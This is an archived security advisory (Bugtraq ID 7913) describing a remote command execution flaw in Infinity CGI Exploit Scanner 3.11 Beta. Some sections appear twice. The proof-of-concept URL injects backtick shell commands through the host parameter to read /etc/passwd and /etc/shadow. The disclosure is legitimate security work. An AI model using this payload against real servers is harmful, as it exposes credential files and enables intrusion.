Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
BID:7913
Info
Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
| Bugtraq ID: | 7913 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 12 2003 12:00AM |
| Updated: | Jun 12 2003 12:00AM |
| Credit: | Discovery of this issue is credited to badpack3t <[email protected]>. |
| Vulnerable: |
The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta Exploit Labs Wood's InfinityScan EZ 3.69 |
| Not Vulnerable: | |
Discussion
Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.
Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.
Exploit / POC
Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
The following proof of concept has been provided:
http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0
The following proof of concept has been provided:
http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0
Solution / Fix
Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Infinity CGI Exploit Scanner Remote Command Execution Vulnerability
References:
References:
- Exploit Labs Homepage (Exploit Labs)